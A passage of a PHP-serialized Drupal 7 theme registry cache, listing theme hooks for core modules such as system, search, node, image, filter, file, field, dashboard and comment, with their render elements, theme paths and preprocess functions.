path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_exposed_filters\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:8:\"checkbox\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_checkbox\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:10:\"checkboxes\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_checkboxes\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:6:\"button\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_button\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:12:\"image_button\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_image_button\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:6:\"hidden\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_hidden\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:9:\"textfield\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_textfield\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:4:\"form\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_form\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:8:\"textarea\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_textarea\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:8:\"password\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_password\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:4:\"file\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_file\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:11:\"tableselect\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_tableselect\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:12:\"form_element\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_form_element\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:20:\"form_required_marker\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:26:\"theme_form_required_marker\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:18:\"form_element_label\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_form_element_label\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:13:\"vertical_tabs\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:19:\"theme_vertical_tabs\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:9:\"container\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_container\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:18:\"system_themes_page\";a:8:{s:9:\"variables\";a:1:{s:12:\"theme_groups\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_system_themes_page\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:20:\"system_settings_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:26:\"theme_system_settings_form\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:12:\"confirm_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_confirm_form\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:23:\"system_modules_fieldset\";a:8:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:29:\"theme_system_modules_fieldset\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:27:\"system_modules_incompatible\";a:8:{s:9:\"variables\";a:1:{s:7:\"message\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:33:\"theme_system_modules_incompatible\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:24:\"system_modules_uninstall\";a:8:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:30:\"theme_system_modules_uninstall\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:13:\"status_report\";a:8:{s:14:\"render element\";s:12:\"requirements\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:19:\"theme_status_report\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:10:\"admin_page\";a:8:{s:9:\"variables\";a:1:{s:6:\"blocks\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_admin_page\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:11:\"admin_block\";a:8:{s:9:\"variables\";a:1:{s:5:\"block\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_admin_block\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"admin_block_content\";a:8:{s:9:\"variables\";a:1:{s:7:\"content\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:25:\"theme_admin_block_content\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:18:\"system_admin_index\";a:8:{s:9:\"variables\";a:1:{s:10:\"menu_items\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_system_admin_index\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:17:\"system_powered_by\";a:6:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:23:\"theme_system_powered_by\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"system_compact_link\";a:6:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:25:\"theme_system_compact_link\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:25:\"system_date_time_settings\";a:8:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:31:\"theme_system_date_time_settings\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:22:\"shortcut_set_customize\";a:8:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:18:\"shortcut.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/shortcut\";s:8:\"function\";s:28:\"theme_shortcut_set_customize\";s:8:\"includes\";a:1:{i:0;s:35:\"modules/shortcut/shortcut.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:17:\"search_block_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:8:\"template\";s:32:\"modules/search/search-block-form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:37:\"template_preprocess_search_block_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:13:\"search_result\";a:8:{s:9:\"variables\";a:2:{s:6:\"result\";N;s:6:\"module\";N;}s:4:\"file\";s:16:\"search.pages.inc\";s:8:\"template\";s:28:\"modules/search/search-result\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/search/search.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:33:\"template_preprocess_search_result\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:14:\"search_results\";a:8:{s:9:\"variables\";a:2:{s:7:\"results\";N;s:6:\"module\";N;}s:4:\"file\";s:16:\"search.pages.inc\";s:8:\"template\";s:29:\"modules/search/search-results\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/search/search.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:34:\"template_preprocess_search_results\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:29:\"rdf_template_variable_wrapper\";a:6:{s:9:\"variables\";a:4:{s:7:\"content\";N;s:10:\"attributes\";a:0:{}s:7:\"context\";a:0:{}s:6:\"inline\";b:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:11:\"modules/rdf\";s:8:\"function\";s:35:\"theme_rdf_template_variable_wrapper\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:12:\"rdf_metadata\";a:6:{s:9:\"variables\";a:1:{s:8:\"metadata\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:11:\"modules/rdf\";s:8:\"function\";s:18:\"theme_rdf_metadata\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:7:\"overlay\";a:6:{s:14:\"render element\";s:4:\"page\";s:8:\"template\";s:23:\"modules/overlay/overlay\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/overlay\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:27:\"template_preprocess_overlay\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:3:{i:0;s:16:\"template_process\";i:1;s:24:\"template_process_overlay\";i:2;s:11:\"rdf_process\";}}s:23:\"overlay_disable_message\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/overlay\";s:8:\"function\";s:29:\"theme_overlay_disable_message\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:12:\"options_none\";a:6:{s:9:\"variables\";a:2:{s:8:\"instance\";N;s:6:\"option\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:29:\"modules/field/modules/options\";s:8:\"function\";s:18:\"theme_options_none\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:4:\"node\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:17:\"modules/node/node\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_node\";i:2;s:21:\"contextual_preprocess\";i:3;s:19:\"rdf_preprocess_node\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:17:\"node_search_admin\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:23:\"theme_node_search_admin\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:13:\"node_add_list\";a:8:{s:9:\"variables\";a:1:{s:7:\"content\";N;}s:4:\"file\";s:14:\"node.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:19:\"theme_node_add_list\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/node/node.pages.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:12:\"node_preview\";a:8:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"file\";s:14:\"node.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:18:\"theme_node_preview\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/node/node.pages.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"node_admin_overview\";a:8:{s:9:\"variables\";a:2:{s:4:\"name\";N;s:4:\"type\";N;}s:4:\"file\";s:17:\"content_types.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:25:\"theme_node_admin_overview\";s:8:\"includes\";a:1:{i:0;s:30:\"modules/node/content_types.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:17:\"node_recent_block\";a:6:{s:9:\"variables\";a:1:{s:5:\"nodes\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:23:\"theme_node_recent_block\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"node_recent_content\";a:6:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:25:\"theme_node_recent_content\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:18:\"menu_overview_form\";a:8:{s:4:\"file\";s:14:\"menu.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/menu\";s:8:\"function\";s:24:\"theme_menu_overview_form\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/menu/menu.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"menu_admin_overview\";a:8:{s:4:\"file\";s:14:\"menu.admin.inc\";s:9:\"variables\";a:3:{s:5:\"title\";N;s:4:\"name\";N;s:11:\"description\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/menu\";s:8:\"function\";s:25:\"theme_menu_admin_overview\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/menu/menu.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:11:\"image_style\";a:6:{s:9:\"variables\";a:7:{s:10:\"style_name\";N;s:4:\"path\";N;s:5:\"width\";N;s:6:\"height\";N;s:3:\"alt\";s:0:\"\";s:5:\"title\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:17:\"theme_image_style\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:16:\"image_style_list\";a:6:{s:9:\"variables\";a:1:{s:6:\"styles\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:22:\"theme_image_style_list\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"image_style_effects\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:25:\"theme_image_style_effects\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"image_style_preview\";a:6:{s:9:\"variables\";a:1:{s:5:\"style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:25:\"theme_image_style_preview\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:12:\"image_anchor\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:18:\"theme_image_anchor\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:20:\"image_resize_summary\";a:6:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:26:\"theme_image_resize_summary\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"image_scale_summary\";a:6:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:25:\"theme_image_scale_summary\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:18:\"image_crop_summary\";a:6:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:24:\"theme_image_crop_summary\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:20:\"image_rotate_summary\";a:6:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:26:\"theme_image_rotate_summary\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:12:\"image_widget\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:18:\"theme_image_widget\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:15:\"image_formatter\";a:6:{s:9:\"variables\";a:3:{s:4:\"item\";N;s:4:\"path\";N;s:11:\"image_style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:21:\"theme_image_formatter\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:21:\"filter_admin_overview\";a:8:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"filter.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:27:\"theme_filter_admin_overview\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:32:\"filter_admin_format_filter_order\";a:8:{s:14:\"render element\";s:7:\"element\";s:4:\"file\";s:16:\"filter.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:38:\"theme_filter_admin_format_filter_order\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:11:\"filter_tips\";a:8:{s:9:\"variables\";a:2:{s:4:\"tips\";N;s:4:\"long\";b:0;}s:4:\"file\";s:16:\"filter.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:17:\"theme_filter_tips\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.pages.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"text_format_wrapper\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:25:\"theme_text_format_wrapper\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:21:\"filter_tips_more_info\";a:6:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:27:\"theme_filter_tips_more_info\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:17:\"filter_guidelines\";a:6:{s:9:\"variables\";a:1:{s:6:\"format\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:23:\"theme_filter_guidelines\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:9:\"file_link\";a:6:{s:9:\"variables\";a:2:{s:4:\"file\";N;s:14:\"icon_directory\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:15:\"theme_file_link\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:9:\"file_icon\";a:6:{s:9:\"variables\";a:2:{s:4:\"file\";N;s:14:\"icon_directory\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:15:\"theme_file_icon\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:17:\"file_managed_file\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:23:\"theme_file_managed_file\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:11:\"file_widget\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:17:\"theme_file_widget\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:20:\"file_widget_multiple\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:26:\"theme_file_widget_multiple\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:20:\"file_formatter_table\";a:6:{s:9:\"variables\";a:1:{s:5:\"items\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:26:\"theme_file_formatter_table\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:16:\"file_upload_help\";a:6:{s:9:\"variables\";a:2:{s:11:\"description\";N;s:17:\"upload_validators\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:22:\"theme_file_upload_help\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:14:\"field_ui_table\";a:6:{s:14:\"render element\";s:8:\"elements\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/field_ui\";s:8:\"function\";s:20:\"theme_field_ui_table\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:5:\"field\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/field\";s:8:\"function\";s:11:\"theme_field\";s:20:\"preprocess functions\";a:2:{i:0;s:25:\"template_preprocess_field\";i:1;s:20:\"rdf_preprocess_field\";}s:17:\"process functions\";a:1:{i:0;s:22:\"template_process_field\";}}s:25:\"field_multiple_value_form\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/field\";s:8:\"function\";s:31:\"theme_field_multiple_value_form\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:13:\"dblog_message\";a:8:{s:9:\"variables\";a:2:{s:5:\"event\";N;s:4:\"link\";b:0;}s:4:\"file\";s:15:\"dblog.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/dblog\";s:8:\"function\";s:19:\"theme_dblog_message\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/dblog/dblog.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:9:\"dashboard\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:15:\"theme_dashboard\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:15:\"dashboard_admin\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:21:\"theme_dashboard_admin\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:16:\"dashboard_region\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:22:\"theme_dashboard_region\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:25:\"dashboard_disabled_blocks\";a:6:{s:9:\"variables\";a:1:{s:6:\"blocks\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:31:\"theme_dashboard_disabled_blocks\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:24:\"dashboard_disabled_block\";a:6:{s:9:\"variables\";a:1:{s:5:\"block\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:30:\"theme_dashboard_disabled_block\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:28:\"dashboard_admin_display_form\";a:9:{s:8:\"template\";s:24:\"block-admin-display-form\";s:4:\"path\";s:13:\"modules/block\";s:4:\"file\";s:15:\"block.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/block/block.admin.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:48:\"template_preprocess_dashboard_admin_display_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:13:\"comment_block\";a:6:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:19:\"theme_comment_block\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:15:\"comment_preview\";a:6:{s:9:\"variables\";a:1:{s:7:\"comment\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:21:\"theme_comment_preview\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:7:\"comment\";a:6:{s:8:\"template\";s:23:\"modules/comment/comment\";s:14:\"render element\";s:8:\"elements\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:20:\"preprocess 